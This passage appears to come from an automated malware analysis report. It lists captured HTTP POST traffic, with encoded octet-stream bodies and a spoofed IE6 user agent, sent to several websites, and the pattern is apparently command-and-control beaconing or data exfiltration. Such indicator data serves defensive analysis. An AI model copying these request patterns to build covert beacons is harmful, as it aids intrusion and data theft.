59 49 42 6f 38 77 7a 54 36 63 46 64 37 47 6a 31 34 68 65 6a 43 46 59 7a 49 63 50 56 5a 72 46 65 5a 33 35 6a 46 66 63 62 49 77 45 31 6e 49 57 2f 42 54 51 59 32 79 69 6b 62 62 72 37 32 34 78 36 48 57 52 34 6f 4e 68 6b 2b 6b 4b 37 65 78 52 6c 56 6d 43 5a 4f 58 75 4b 6b 6c 36 4b 31 79 46 4a 66 6d 65 47 66 57 50 34 45 71 35 55 59 59 64 33 78 6b 5a 50 43 45 35 6b 47 6f 36 41 32 74 43 70 73 6c 48 4f 41 4a 46 33 50 4b 50 66 34 55 61 31 6c 6b 49 76 45 59 45 55 58 75 49 48 51 68 51 75 49 4e 30 64 52 70 33 2f 5a 52 6c 47 48 58 2f 56 59 4d 71 41 71 31 53 36 6b 69 55 61 4d 73 4c 72 48 4e 6b 58 52 69 49 34 3d Data Ascii: /TMJoCCIV4w7a4quc5w9iFOEBAmIGTCdVOmCmw4S57548k86j0Y9wMsYup0/4pXixvOlJP2Oiw5BcXnkf2HHijfgSiOoNW7InjgkjzZx5fw+8ST56DB26M/Ny7HgSw9GeDrpl/ZszdfvEupfxn7JQTmnFysvvEH/kCKVLiA5cQ303qkwDO0NPaXvVv6G4dDDrzCA553wi5rfHaIYXKQPzR75duHSWCuJctkYpL0/Mb9sK+BUTFa7/yjXgyxov4zBDQ1IQkz/arJi2KkulK+QBOOQHHO2/3MToBBRjf2lf9YzoA6A4fZNgT/Rq4zT9H73aPWsCZfnVuL70ix7P6/hFvwQrZMWaIFSbEeLdfSaQhZVSxtxwSLUGD7YIBo8wzT6cFd7Gj14hejCFYzIcPVZrFeZ35jFfcbIwE1nIW/BTQY2yikbbr724x6HWR4oNhk+kK7exRlVmCZOXuKkl6K1yFJfmeGfWP4Eq5UYYd3xkZPCE5kGo6A2tCpslHOAJF3PKPf4Ua1lkIvEYEUXuIHQhQuIN0dRp3/ZRlGHX/VYMqAq1S6kiUaMsLrHNkXRiI4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 46 6a 45 4b 71 6b 6e 62 56 34 79 6b 68 42 77 42 6d 43 78 6c 79 47 49 71 46 67 64 6e 47 6c 46 65 6a 63 49 63 70 74 48 6c 72 45 43 31 78 4f 7a 75 77 55 43 67 70 61 4c 6a 4d 6d 61 2f 76 38 41 75 57 53 4e 49 44 65 38 35 52 59 62 4d 52 74 4b 73 7a 34 6e 46 4b 2f 48 61 56 30 6d 61 55 56 6b 76 78 58 72 37 4d 33 6d 46 79 32 58 66 6c 37 6b 55 66 6a 6d 72 72 71 73 37 56 31 35 7a 53 44 67 44 72 67 4d 78 54 50 7a 72 31 7a 43 72 45 54 43 45 57 67 51 71 6c 53 77 73 76 39 57 6d 2f 44 77 50 66 4f 46 57 72 59 32 6c 6c 63 6b 56 6f 44 56 2f 46 46 4b 4e 48 72 5a 6c 4d 7a 44 36 70 69 58 75 48 49 4d 62 70 4b 52 4f 42 54 46 57 6a 6b 4f 37 65 74 78 58 6d 41 38 58 31 66 68 66 4f 4f 4a 64 38 30 49 4f 77 54 34 61 51 2f 51 36 49 4d 66 63 6d 4f 34 73 33 39 46 63 61 41 38 66 71 76 44 53 6c 4c 55 6a 67 70 39 43 35 54 78 5a 5a 48 35 70 77 77 32 42 5a 6b 72 72 70 71 30 37 4a 5a 74 74 70 6d 4f 44 79 36 37 67 6f 49 6c 38 56 6b 4e 78 4a 37 6e 4b 75 45 75 78 66 7a 6f 4e 73 4d 63 54 53 47 66 44 34 51 63 30 74 55 63 66 53 72 78 37 74 73 2f 42 71 56 56 73 7a 32 75 37 46 68 62 61 38 53 54 35 43 62 2b 32 4c 37 45 49 6f 4e 55 79 71 36 6e 76 50 67 4a 77 59 36 56 55 39 59 4d 61 4b 76 6c 74 6a 35 78 37 6b 64 35 4e 79 55 48 58 45 6f 4e 32 6b 4a 58 42 4d 36 47 30 51 73 59 37 71 57 62 53 63 79 64 76 50 2f 6e 53 47 35 44 6a 4c 68 45 73 4c 4b 4b 57 76 42 58 48 70 2b 30 64 55 79 4f 72 44 4b 59 64 38 59 52 78 4b 70 75 76 58 65 49 4f 71 56 58 2f 42 77 33 53 6d 68 6c 30 78 64 36 4d 4b 48 45 59 30 55 45 59 30 71 56 62 63 32 53 51 5a 58 34 50 4c 48 72 69 6c 31 41 72 53 62 71 65 4a 63 66 61 75 45 56 75 77 33 63 63 64 42 79 75 6c 71 72 6a 6e 37 45 3d Data Ascii: FjEKqknbV4ykhBwBmCxlyGIqFgdnGlFejcIcptHlrEC1xOzuwUCgpaLjMma/v8AuWSNIDe85RYbMRtKsz4nFK/HaV0maUVkvxXr7M3mFy2Xfl7kUfjmrrqs7V15zSDgDrgMxTPzr1zCrETCEWgQqlSwsv9Wm/DwPfOFWrY2llckVoDV/FFKNHrZlMzD6piXuHIMbpKROBTFWjkO7etxXmA8X1fhfOOJd80IOwT4aQ/Q6IMfcmO4s39FcaA8fqvDSlLUjgp9C5TxZZH5pww2BZkrrpq07JZttpmODy67goIl8VkNxJ7nKuEuxfzoNsMcTSGfD4Qc0tUcfSrx7ts/BqVVsz2u7Fhba8ST5Cb+2L7EIoNUyq6nvPgJwY6VU9YMaKvltj5x7kd5NyUHXEoN2kJXBM6G0QsY7qWbScydvP/nSG5DjLhEsLKKWvBXHp+0dUyOrDKYd8YRxKpuvXeIOqVX/Bw3Smhl0xd6MKHEY0UEY0qVbc2SQZX4PLHril1ArSbqeJcfauEVuw3ccdByulqrjn7E=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 30 2f 38 47 64 73 69 73 6d 49 78 67 2b 6b 67 7a 43 32 6d 50 46 44 73 62 38 72 6c 51 50 33 47 61 66 41 7a 6a 77 7a 72 65 52 66 55 41 61 41 6e 35 45 53 6d 4d 30 63 2f 34 51 55 4b 33 69 76 4e 58 78 4f 50 7a 6d 38 65 4d 55 30 46 6c 4c 73 54 73 71 65 6b 74 49 46 30 2b 41 4b 53 45 78 6c 6b 35 51 67 70 58 6a 52 42 50 5a 56 61 2b 55 35 36 59 6e 33 45 61 34 63 74 33 51 2b 54 38 65 34 36 4f 71 62 56 61 49 70 57 37 4e 6c 2b 4e 30 4d 61 33 6d 32 32 57 78 39 4f 79 75 4d 50 33 34 32 62 77 52 4f 75 49 70 36 61 55 5a 34 6b 6d 75 72 38 2b 4c 62 44 65 4a 30 6b 72 4f 4a 61 33 33 64 6f 57 70 69 63 4e 58 4e 6f 59 62 36 58 36 36 47 63 6a 39 70 52 49 76 33 5a 58 2b 64 30 38 6c 57 52 4f 67 57 55 77 52 53 78 56 30 64 34 53 48 32 72 41 53 39 6e 4d 74 58 52 50 49 6a 70 68 50 54 57 35 59 32 49 77 57 48 70 2f 51 30 48 57 67 35 4f 62 73 6c 56 57 37 5a 33 75 77 37 6f 66 77 69 35 79 6b 71 45 56 70 44 76 2b 54 2b 59 6b 51 54 70 6d 33 37 2f 6f 43 4b 7a 6a 4a 48 49 2f 72 36 6c 7a 45 48 4f 76 6c 46 33 78 45 6f 6f 52 4a 33 51 5a 41 6f 5a 39 44 76 56 4b 45 67 6d 56 4f 42 38 4b 77 6a 4a 52 64 36 6d 53 2f 52 2b 43 32 71 74 66 34 33 32 33 33 65 4e 67 5a 4d 47 4d 49 57 63 71 55 50 72 66 6d 67 74 59 59 6e 35 6d 43 73 57 79 64 6c 57 69 65 62 63 74 75 68 6c 4d 71 4b 32 39 39 74 44 55 52 42 58 49 34 38 61 52 2b 44 69 6e 62 51 53 2b 68 6d 58 6b 4d 64 4a 75 6d 71 44 39 71 64 72 63 66 6e 70 53 69 78 4e 38 65 34 56 46 78 5a 63 6b 76 77 69 54 41 30 33 78 73 59 74 41 51 4f 46 44 6d 67 65 78 4d 73 35 4a 5a 4b 75 31 57 52 72 48 42 70 44 34 78 33 58 49 6f 75 68 64 39 58 66 69 2b 79 34 6e 6a 6d 39 31 36 34 63 67 6d 6c 6c 59 34 33 2b 77 55 64 6c 37 4d 61 2f 5a 4f 41 37 62 47 63 56 57 72 35 6f 38 4d 2b 41 35 4d 54 64 33 Data Ascii: 0/8GdsismIxg+kgzC2mPFDsb8rlQP3GafAzjwzreRfUAaAn5ESmM0c/4QUK3ivNXxOPzm8eMU0FlLsTsqektIF0+AKSExlk5QgpXjRBPZVa+U56Yn3Ea4ct3Q+T8e46OqbVaIpW7Nl+N0Ma3m22Wx9OyuMP342bwROuIp6aUZ4kmur8+LbDeJ0krOJa33doWpicNXNoYb6X66Gcj9pRIv3ZX+d08lWROgWUwRSxV0d4SH2rAS9nMtXRPIjphPTW5Y2IwWHp/Q0HWg5ObslVW7Z3uw7ofwi5ykqEVpDv+T+YkQTpm37/oCKzjJHI/r6lzEHOvlF3xEooRJ3QZAoZ9DvVKEgmVOB8KwjJRd6mS/R+C2qtf43233eNgZMGMIWcqUPrfmgtYYn5mCsWydlWiebctuhlMqK299tDURBXI48aR+DinbQS+hmXkMdJumqD9qdrcfnpSixN8e4VFxZckvwiTA03xsYtAQOFDmgexMs5JZKu1WRrHBpD4x3XIouhd9Xfi+y4njm9164cgmllY43+wUdl7Ma/ZOA7bGcVWr5o8M+A5MTd3
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 6f 32 48 75 61 59 64 49 6d 49 79 73 34 32 37 53 74 6d 77 2f 49 6c 43 4d 63 4e 42 39 47 38 4f 51 71 35 78 37 76 52 52 39 65 6a 42 61 32 51 61 64 74 37 50 56 52 5a 2b 6e 43 6f 4f 4a 6f 36 73 53 4d 4a 6b 4f 69 48 59 79 6c 77 76 51 31 44 53 56 47 61 2b 56 72 41 61 76 49 61 6a 6e 4a 37 49 73 33 78 70 58 44 42 38 4e 54 64 33 63 6f 30 6e 5a 4f 58 37 4e 4d 4a 69 6a 6e 7a 39 4b 36 73 51 53 43 45 65 45 30 43 57 32 6f 52 41 75 75 46 51 32 7a 38 79 56 56 48 74 4e 66 48 62 58 56 37 30 41 4a 71 61 47 7a 61 4f 61 64 5a 6c 67 71 50 53 48 35 39 68 31 47 72 6b 76 72 62 54 79 2b 62 73 57 57 62 69 46 32 4f 58 6e 76 34 73 4e 42 39 64 38 75 78 34 35 42 6c 64 6f 61 62 35 50 31 6f 59 5a 78 39 48 75 74 4c 64 55 70 53 57 7a 67 31 71 38 51 7a 6b 37 4b 4a 2f 76 6b 38 35 56 68 73 39 39 31 42 38 57 66 72 77 36 56 37 53 57 42 5a 48 78 75 62 44 32 4f 51 2f 48 34 6c 77 71 47 71 2b 38 79 73 6a 39 66 33 35 34 48 6c 4f 62 72 4a 6f 30 48 32 52 50 6a 68 30 44 39 63 32 43 54 38 74 6a 45 5a 43 53 4a 30 4d 51 6c 4b 74 55 50 34 46 7a 4c 71 59 4b 4b 34 45 4f 42 4d 53 78 34 2b 57 73 4f 54 4c 37 2b 38 32 67 66 4e 66 67 65 75 59 49 70 41 46 56 44 5a 7a 65 31 72 45 5a 72 78 58 53 48 47 34 48 73 48 72 4a 67 56 44 37 56 31 57 32 4b 4a 73 56 4c 70 4d 57 77 6b 31 4f 43 43 42 2f 4b 66 51 56 43 31 66 78 67 4c 47 6c 58 74 49 73 45 49 72 6d 73 61 72 75 68 66 50 64 65 4c 78 36 53 57 78 63 53 31 2f 6d 65 33 64 44 37 78 30 47 46 46 5a 76 59 68 6a 72 48 44 44 55 38 4d 47 58 66 36 4f 38 5a 66 30 4b 51 65 35 45 78 6e 78 47 4a 44 35 56 70 52 46 6a 47 66 47 4c 4a 6e 78 42 7a 70 33 6e 32 31 63 35 4c 61 6f 47 55 54 38 42 36 37 57 53 56 69 61 55 50 59 4a 39 4c 43 57 30 61 6f 59 77 75 6b 48 66 62 77 64 35 72 32 33 37 36 53 2f 67 72 53 4b 71 69 54 49 3d Data Ascii: o2HuaYdImIys427Stmw/IlCMcNB9G8OQq5x7vRR9ejBa2Qadt7PVRZ+nCoOJo6sSMJkOiHYylwvQ1DSVGa+VrAavIajnJ7Is3xpXDB8NTd3co0nZOX7NMJijnz9K6sQSCEeE0CW2oRAuuFQ2z8yVVHtNfHbXV70AJqaGzaOadZlgqPSH59h1GrkvrbTy+bsWWbiF2OXnv4sNB9d8ux45Bldoab5P1oYZx9HutLdUpSWzg1q8Qzk7KJ/vk85Vhs991B8Wfrw6V7SWBZHxubD2OQ/H4lwqGq+8ysj9f354HlObrJo0H2RPjh0D9c2CT8tjEZCSJ0MQlKtUP4FzLqYKK4EOBMSx4+WsOTL7+82gfNfgeuYIpAFVDZze1rEZrxXSHG4HsHrJgVD7V1W2KJsVLpMWwk1OCCB/KfQVC1fxgLGlXtIsEIrmsaruhfPdeLx6SWxcS1/me3dD7x0GFFZvYhjrHDDU8MGXf6O8Zf0KQe5ExnxGJD5VpRFjGfGLJnxBzp3n21c5LaoGUT8B67WSViaUPYJ9LCW0aoYwukHfbwd5r2376S/grSKqiTI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 36 2f 2b 43 65 68 44 53 6d 49 78 49 31 56 45 6f 6f 2f 35 7a 78 38 4f 58 4d 47 63 34 73 6f 4e 31 52 42 71 6b 44 46 65 6d 6e 55 68 6c 32 64 51 48 6e 76 55 75 45 49 67 6d 6a 37 35 39 66 2b 67 31 78 50 62 2f 6c 72 72 6d 4f 6b 47 48 75 32 79 4d 36 79 4d 59 77 37 6b 2f 62 6e 66 4c 6e 6c 43 4a 55 68 6b 47 37 2f 6a 69 35 41 6f 46 47 34 57 68 66 4e 72 79 77 6e 57 71 4c 59 57 62 78 2b 46 56 70 64 31 59 36 56 66 6d 62 61 6d 45 74 61 6d 79 42 61 43 78 76 35 79 65 33 47 53 69 64 59 69 6e 7a 34 7a 7a 6c 4e 64 6e 51 61 33 42 43 58 54 43 50 6d 62 4f 37 34 49 55 38 63 74 70 52 57 71 33 4e 42 77 4a 35 79 43 65 49 43 6e 53 4f 2f 6f 74 74 37 55 48 34 52 4c 54 30 72 57 63 48 4e 5a 4b 45 32 35 2f 6f 76 46 70 45 36 32 6e 48 53 77 57 2f 61 51 55 4d 53 4e 66 49 47 77 7a 77 58 45 6e 66 55 2b 69 36 51 4a 5a 58 42 6d 43 34 73 6a 54 51 47 35 66 65 75 68 4d 75 55 69 71 77 43 73 48 5a 4e 64 77 6e 6f 72 35 77 54 39 31 59 4f 33 50 37 6a 2f 69 35 72 36 4a 68 30 4f 58 45 6b 72 5a 6d 4e 74 2b 39 55 67 6f 65 65 32 61 38 78 62 6d 56 4d 6c 7a 4b 64 48 49 37 37 65 4f 63 61 79 38 61 4d 6c 4a 57 32 77 51 69 34 76 39 63 67 35 63 38 33 72 32 46 70 69 59 45 69 62 7a 71 47 69 67 4b 78 30 37 56 62 56 55 55 35 77 72 46 2f 2b 32 54 77 4d 45 66 62 78 6e 48 5a 69 44 70 31 61 31 48 79 6e 31 50 43 2b 6a 51 72 44 66 65 76 47 67 42 64 68 6e 39 47 34 37 76 63 4f 47 37 4a 31 78 61 76 41 67 6b 74 49 36 75 69 46 73 65 7a 49 6b 63 2b 44 4a 47 79 41 61 79 54 43 47 6c 30 5a 79 57 4e 2f 43 35 51 38 68 44 4b 2b 6e 71 58 51 68 59 6d 50 66 72 72 4b 69 65 32 4e 74 76 7a 38 30 72 57 35 4f 34 76 35 6a 43 73 2b 5a 64 66 32 33 57 75 48 76 34 45 7a 4b 45 77 34 54 2b 36 53 54 31 6f 44 37 58 6f 49 54 43 69 58 62 6b 75 68 78 6d 63 70 6f 30 43 66 50 54 72 77 39 7a 45 2f 32 37 6e 67 54 45 77 3d 3d Data Ascii: 6/+CehDSmIxI1VEoo/5zx8OXMGc4soN1RBqkDFemnUhl2dQHnvUuEIgmj759f+g1xPb/lrrmOkGHu2yM6yMYw7k/bnfLnlCJUhkG7/ji5AoFG4WhfNrywnWqLYWbx+FVpd1Y6VfmbamEtamyBaCxv5ye3GSidYinz4zzlNdnQa3BCXTCPmbO74IU8ctpRWq3NBwJ5yCeICnSO/ott7UH4RLT0rWcHNZKE25/ovFpE62nHSwW/aQUMSNfIGwzwXEnfU+i6QJZXBmC4sjTQG5feuhMuUiqwCsHZNdwnor5wT91YO3P7j/i5r6Jh0OXEkrZmNt+9Ugoee2a8xbmVMlzKdHI77eOcay8aMlJW2wQi4v9cg5c83r2FpiYEibzqGigKx07VbVUU5wrF/+2TwMEfbxnHZiDp1a1Hyn1PC+jQrDfevGgBdhn9G47vcOG7J1xavAgktI6uiFsezIkc+DJGyAayTCGl0ZyWN/C5Q8hDK+nqXQhYmPfrrKie2Ntvz80rW5O4v5jCs+Zdf23WuHv4EzKEw4T+6ST1oD7XoITCiXbkuhxmcpo0CfPTrw9zE/27ngTEw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 4e 2b 6b 39 53 62 4b 49 6e 34 7a 76 74 58 38 71 35 64 42 68 53 72 56 63 73 56 61 43 45 73 43 4f 42 76 72 51 49 38 38 62 55 7a 59 30 73 42 58 4d 61 36 72 4b 46 53 6d 6a 71 77 2f 72 2f 74 47 57 46 31 73 36 6f 5a 47 50 32 4e 67 6c 35 70 38 6d 77 50 73 54 61 4d 61 67 35 71 7a 38 48 6c 47 67 6c 6a 65 50 4a 43 43 2b 53 5a 32 59 68 54 50 66 6e 74 30 4c 64 31 66 32 7a 6a 54 30 71 61 30 6b 45 71 71 4d 30 34 4d 79 61 73 6b 75 36 48 68 6c 7a 72 6e 69 78 5a 69 50 6b 51 41 4e 7a 51 74 6c 44 72 4f 58 56 52 62 36 6a 79 39 4a 55 6d 58 45 43 78 70 4a 30 33 59 41 37 39 69 38 75 65 68 48 7a 7a 39 6f 76 69 6b 69 38 6b 47 6e 36 2b 33 4d 35 31 51 2f 64 79 4d 32 4b 31 31 57 2b 4b 6b 65 53 46 41 64 51 70 42 56 30 4f 31 37 59 56 63 44 7a 38 41 6c 6a 72 54 6a 6d 6a 78 49 4a 37 67 42 71 6e 62 65 38 37 74 33 73 35 2b 70 59 64 4a 46 45 46 36 78 71 31 4c 38 37 38 4b 30 32 6e 37 56 71 73 77 35 73 30 48 4a 44 59 69 30 67 55 4a 58 75 50 57 68 4f 6d 6f 59 55 66 67 6c 4b 43 5a 30 38 52 37 38 6d 66 30 74 6c 35 2b 35 4d 44 78 75 35 48 67 52 4a 71 6d 50 35 5a 74 48 7a 75 59 75 53 42 71 63 4b 49 6f 79 56 6a 73 53 6a 54 6a 4a 52 63 4f 31 64 38 4a 61 64 30 76 43 52 70 4b 64 4f 79 6a 6c 4f 6e 77 34 37 77 73 41 55 32 77 36 69 44 7a 6d 65 33 76 53 65 69 38 7a 45 6c 53 36 6f 53 4e 54 6d 37 44 44 74 4d 63 53 63 56 2b 54 4a 33 78 78 43 6a 50 50 48 66 38 32 52 52 44 61 36 34 4e 76 75 50 66 63 33 4f 58 6c 58 36 4a 6b 54 30 75 58 79 46 66 4a 45 4b 67 4a 6c 6c 59 78 2f 31 43 6b 78 79 53 47 49 41 75 58 58 55 4c 56 55 42 54 6d 44 57 2b 75 66 54 44 4c 41 38 4e 4c 74 39 65 51 72 31 50 4e 78 6d 37 4b 46 56 78 6d 6f 51 59 42 33 36 32 75 73 78 47 36 4d 42 38 33 2f 56 67 6a 68 53 54 4a 4d 68 71 47 51 74 76 54 42 49 72 67 2f 32 52 6a 72 50 77 51 4b 73 75 46 72 47 4e 72 67 38 62 69 6e 75 50 41 58 2b 62 71 58 4b 55 3d Data Ascii: N+k9SbKIn4zvtX8q5dBhSrVcsVaCEsCOBvrQI88bUzY0sBXMa6rKFSmjqw/r/tGWF1s6oZGP2Ngl5p8mwPsTaMag5qz8HlGgljePJCC+SZ2YhTPfnt0Ld1f2zjT0qa0kEqqM04Myasku6HhlzrnixZiPkQANzQtlDrOXVRb6jy9JUmXECxpJ03YA79i8uehHzz9oviki8kGn6+3M51Q/dyM2K11W+KkeSFAdQpBV0O17YVcDz8AljrTjmjxIJ7gBqnbe87t3s5+pYdJFEF6xq1L878K02n7Vqsw5s0HJDYi0gUJXuPWhOmoYUfglKCZ08R78mf0tl5+5MDxu5HgRJqmP5ZtHzuYuSBqcKIoyVjsSjTjJRcO1d8Jad0vCRpKdOyjlOnw47wsAU2w6iDzme3vSei8zElS6oSNTm7DDtMcScV+TJ3xxCjPPHf82RRDa64NvuPfc3OXlX6JkT0uXyFfJEKgJllYx/1CkxySGIAuXXULVUBTmDW+ufTDLA8NLt9eQr1PNxm7KFVxmoQYB362usxG6MB83/VgjhSTJMhqGQtvTBIrg/2RjrPwQKsuFrGNrg8binuPAX+bqXKU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 36 2f 2b 43 65 68 44 53 6d 49 78 49 31 56 45 6f 6f 2f 35 7a 78 38 4f 58 4d 47 63 34 73 6f 4e 31 52 42 71 6b 44 46 65 6d 6e 55 68 6c 32 64 51 48 6e 76 55 75 45 49 67 6d 6a 37 35 39 66 2b 67 31 78 50 62 2f 6c 72 72 6d 4f 6b 47 48 75 32 79 4d 36 79 4d 59 77 37 6b 2f 62 6e 66 4c 6e 6c 43 4a 55 68 6b 47 37 2f 6a 69 35 41 6f 46 47 34 57 68 66 4e 72 79 77 6e 57 71 4c 59 57 62 78 2b 46 56 70 64 31 59 36 56 66 6d 62 61 6d 45 74 61 6d 79 42 61 43 78 76 35 79 65 33 47 53 69 64 59 69 6e 7a 34 7a 7a 6c 4e 64 6e 51 61 33 42 43 58 54 43 50 6d 62 4f 37 34 49 55 38 63 74 70 52 57 71 33 4e 42 77 4a 35 79 43 65 49 43 6e 53 4f 2f 6f 74 74 37 55 48 34 52 4c 54 30 72 57 63 48 4e 5a 4b 45 32 35 2f 6f 76 46 70 45 36 32 6e 48 53 77 57 2f 61 51 55 4d 53 4e 66 49 47 77 7a 77 58 45 6e 66 55 2b 69 36 51 4a 5a 58 42 6d 43 34 73 6a 54 51 47 35 66 65 75 68 4d 75 55 69 71 77 43 73 48 5a 4e 64 77 6e 6f 72 35 77 54 39 31 59 4f 33 50 37 6a 2f 69 35 72 36 4a 68 30 4f 58 45 6b 72 5a 6d 4e 74 2b 39 55 67 6f 65 65 32 61 38 78 62 6d 56 4d 6c 7a 4b 64 48 49 37 37 65 4f 63 61 79 38 61 4d 6c 4a 57 32 77 51 69 34 76 39 63 67 35 63 38 33 72 32 46 70 69 59 45 69 62 7a 71 47 69 67 4b 78 30 37 56 62 56 55 55 35 77 72 46 2f 2b 32 54 77 4d 45 66 62 78 6e 48 5a 69 44 70 31 61 31 48 79 6e 31 50 43 2b 6a 51 72 44 66 65 76 47 67 42 64 68 6e 39 47 34 37 76 63 4f 47 37 4a 31 78 61 76 41 67 6b 74 49 36 75 69 46 73 65 7a 49 6b 63 2b 44 4a 47 79 41 61 79 54 43 47 6c 30 5a 79 57 4e 2f 43 35 51 38 68 44 4b 2b 6e 71 58 51 68 59 6d 50 66 72 72 4b 69 65 32 4e 74 76 7a 38 30 72 57 35 4f 34 76 35 6a 43 73 2b 5a 64 66 32 33 57 75 48 76 34 45 7a 4b 45 77 34 54 2b 36 53 54 31 6f 44 37 58 6f 49 54 43 69 58 62 6b 75 68 78 6d 63 70 6f 30 43 66 50 54 72 77 39 7a 45 2f 32 37 6e 67 54 45 77 3d 3d Data Ascii: 6/+CehDSmIxI1VEoo/5zx8OXMGc4soN1RBqkDFemnUhl2dQHnvUuEIgmj759f+g1xPb/lrrmOkGHu2yM6yMYw7k/bnfLnlCJUhkG7/ji5AoFG4WhfNrywnWqLYWbx+FVpd1Y6VfmbamEtamyBaCxv5ye3GSidYinz4zzlNdnQa3BCXTCPmbO74IU8ctpRWq3NBwJ5yCeICnSO/ott7UH4RLT0rWcHNZKE25/ovFpE62nHSwW/aQUMSNfIGwzwXEnfU+i6QJZXBmC4sjTQG5feuhMuUiqwCsHZNdwnor5wT91YO3P7j/i5r6Jh0OXEkrZmNt+9Ugoee2a8xbmVMlzKdHI77eOcay8aMlJW2wQi4v9cg5c83r2FpiYEibzqGigKx07VbVUU5wrF/+2TwMEfbxnHZiDp1a1Hyn1PC+jQrDfevGgBdhn9G47vcOG7J1xavAgktI6uiFsezIkc+DJGyAayTCGl0ZyWN/C5Q8hDK+nqXQhYmPfrrKie2Ntvz80rW5O4v5jCs+Zdf23WuHv4EzKEw4T+6ST1oD7XoITCiXbkuhxmcpo0CfPTrw9zE/27ngTEw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 4e 2b 6b 39 53 62 4b 49 6e 34 7a 76 74 58 38 71 35 64 42 68 53 72 56 63 73 56 61 43 45 73 43 4f 42 76 72 51 49 38 38 62 55 7a 59 30 73 42 58 4d 61 36 72 4b 46 53 6d 6a 71 77 2f 72 2f 74 47 57 46 31 73 36 6f 5a 47 50 32 4e 67 6c 35 70 38 6d 77 50 73 54 61 4d 61 67 35 71 7a 38 48 6c 47 67 6c 6a 65 50 4a 43 43 2b 53 5a 32 59 68 54 50 66 6e 74 30 4c 64 31 66 32 7a 6a 54 30 71 61 30 6b 45 71 71 4d 30 34 4d 79 61 73 6b 75 36 48 68 6c 7a 72 6e 69 78 5a 69 50 6b 51 41 4e 7a 51 74 6c 44 72 4f 58 56 52 62 36 6a 79 39 4a 55 6d 58 45 43 78 70 4a 30 33 59 41 37 39 69 38 75 65 68 48 7a 7a 39 6f 76 69 6b 69 38 6b 47 6e 36 2b 33 4d 35 31 51 2f 64 79 4d 32 4b 31 31 57 2b 4b 6b 65 53 46 41 64 51 70 42 56 30 4f 31 37 59 56 63 44 7a 38 41 6c 6a 72 54 6a 6d 6a 78 49 4a 37 67 42 71 6e 62 65 38 37 74 33 73 35 2b 70 59 64 4a 46 45 46 36 78 71 31 4c 38 37 38 4b 30 32 6e 37 56 71 73 77 35 73 30 48 4a 44 59 69 30 67 55 4a 58 75 50 57 68 4f 6d 6f 59 55 66 67 6c 4b 43 5a 30 38 52 37 38 6d 66 30 74 6c 35 2b 35 4d 44 78 75 35 48 67 52 4a 71 6d 50 35 5a 74 48 7a 75 59 75 53 42 71 63 4b 49 6f 79 56 6a 73 53 6a 54 6a 4a 52 63 4f 31 64 38 4a 61 64 30 76 43 52 70 4b 64 4f 79 6a 6c 4f 6e 77 34 37 77 73 41 55 32 77 36 69 44 7a 6d 65 33 76 53 65 69 38 7a 45 6c 53 36 6f 53 4e 54 6d 37 44 44 74 4d 63 53 63 56 2b 54 4a 33 78 78 43 6a 50 50 48 66 38 32 52 52 44 61 36 34 4e 76 75 50 66 63 33 4f 58 6c 58 36 4a 6b 54 30 75 58 79 46 66 4a 45 4b 67 4a 6c 6c 59 78 2f 31 43 6b 78 79 53 47 49 41 75 58 58 55 4c 56 55 42 54 6d 44 57 2b 75 66 54 44 4c 41 38 4e 4c 74 39 65 51 72 31 50 4e 78 6d 37 4b 46 56 78 6d 6f 51 59 42 33 36 32 75 73 78 47 36 4d 42 38 33 2f 56 67 6a 68 53 54 4a 4d 68 71 47 51 74 76 54 42 49 72 67 2f 32 52 6a 72 50 77 51 4b 73 75 46 72 47 4e 72 67 38 62 69 6e 75 50 41 58 2b 62 71 58 4b 55 3d Data Ascii: N+k9SbKIn4zvtX8q5dBhSrVcsVaCEsCOBvrQI88bUzY0sBXMa6rKFSmjqw/r/tGWF1s6oZGP2Ngl5p8mwPsTaMag5qz8HlGgljePJCC+SZ2YhTPfnt0Ld1f2zjT0qa0kEqqM04Myasku6HhlzrnixZiPkQANzQtlDrOXVRb6jy9JUmXECxpJ03YA79i8uehHzz9oviki8kGn6+3M51Q/dyM2K11W+KkeSFAdQpBV0O17YVcDz8AljrTjmjxIJ7gBqnbe87t3s5+pYdJFEF6xq1L878K02n7Vqsw5s0HJDYi0gUJXuPWhOmoYUfglKCZ08R78mf0tl5+5MDxu5HgRJqmP5ZtHzuYuSBqcKIoyVjsSjTjJRcO1d8Jad0vCRpKdOyjlOnw47wsAU2w6iDzme3vSei8zElS6oSNTm7DDtMcScV+TJ3xxCjPPHf82RRDa64NvuPfc3OXlX6JkT0uXyFfJEKgJllYx/1CkxySGIAuXXULVUBTmDW+ufTDLA8NLt9eQr1PNxm7KFVxmoQYB362usxG6MB83/VgjhSTJMhqGQtvTBIrg/2RjrPwQKsuFrGNrg8binuPAX+bqXKU=
